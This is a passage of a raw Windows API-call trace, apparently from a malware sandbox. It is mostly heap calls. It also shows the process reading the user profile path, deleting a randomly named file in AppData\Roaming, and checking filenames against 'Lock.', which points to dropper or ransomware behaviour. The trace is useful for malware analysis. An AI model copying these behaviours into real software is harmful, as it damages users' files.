returned 1 [0240.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0240.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0240.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0240.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0240.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0240.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0240.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0240.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0240.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0240.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0240.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0240.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0240.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0240.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0240.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0240.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0240.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0240.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0240.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0240.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0240.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0240.718] CloseHandle (hObject=0x2a0) returned 1 [0240.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0240.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0240.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0240.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0240.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0240.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0240.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0240.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0240.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0240.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0240.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf67c0 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8a0 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa30 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0240.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa58 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faf8 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fad0 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa80 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa08 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f850 | out: hHeap=0x970000) returned 1 [0240.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8f0 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f968 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9e0 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0240.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0240.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0240.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0240.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0240.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0240.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0240.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0240.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0240.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0240.781] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0240.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0240.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0240.781] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0240.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0240.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0240.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0240.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0240.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0240.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0240.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0240.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0240.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0240.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0240.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0240.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0240.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0240.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0240.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0240.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0240.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x68) returned 0x2e564e0 [0240.782] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/vJXjfUq6n4avnAr.avi", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\vJXjfUq6n4avnAr.avi", lpFilePart=0x8cedf4*="vJXjfUq6n4avnAr.avi") returned 0x33 [0240.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0240.782] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\vJXjfUq6n4avnAr.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\vjxjfuq6n4avnar.avi")) returned 0x20 [0240.785] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\vJXjfUq6n4avnAr.avi", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b87c5f0, ftCreationTime.dwHighDateTime=0x1d5e7ff, ftLastAccessTime.dwLowDateTime=0x4f8ae120, ftLastAccessTime.dwHighDateTime=0x1d5e107, ftLastWriteTime.dwLowDateTime=0x4f8ae120, ftLastWriteTime.dwHighDateTime=0x1d5e107, nFileSizeHigh=0x0, nFileSizeLow=0xccb, dwReserved0=0x1, dwReserved1=0x1c, cFileName="vJXjfUq6n4avnAr.avi", cAlternateFileName="VJXJFU~1.AVI")) returned 0xa87490 [0240.785] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\vJXjfUq6n4avnAr.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\vjxjfuq6n4avnar.avi")) returned 1 [0240.823] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b87c5f0, ftCreationTime.dwHighDateTime=0x1d5e7ff, ftLastAccessTime.dwLowDateTime=0x4f8ae120, ftLastAccessTime.dwHighDateTime=0x1d5e107, ftLastWriteTime.dwLowDateTime=0x4f8ae120, ftLastWriteTime.dwHighDateTime=0x1d5e107, nFileSizeHigh=0x0, nFileSizeLow=0xccb, dwReserved0=0x1, dwReserved1=0x1c, cFileName="vJXjfUq6n4avnAr.avi", cAlternateFileName="VJXJFU~1.AVI")) returned 0 [0240.823] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0240.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0240.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0240.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0240.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0240.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0240.823] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0240.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0240.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0240.823] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0240.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0240.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0240.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0240.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0240.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0240.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0240.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0240.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0240.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0240.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0240.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0240.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0240.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0240.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0240.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0240.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0240.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0240.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0240.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x68) returned 0x2e564e0 [0240.824] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/vJXjfUq6n4avnAr.avi", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\vJXjfUq6n4avnAr.avi", lpFilePart=0x8cf650*="vJXjfUq6n4avnAr.avi") returned 0x33 [0240.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0240.824] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\vJXjfUq6n4avnAr.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\vjxjfuq6n4avnar.avi")) returned 0xffffffff [0240.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0240.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0240.825] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.825] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.825] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0240.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0240.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0240.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0240.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0240.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0240.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yYa4EeIK4zJ1bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0240.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ya4EeIK4zJ1bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0240.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a4EeIK4zJ1bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4EeIK4zJ1bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EeIK4zJ1bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eIK4zJ1bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IK4zJ1bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K4zJ1bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 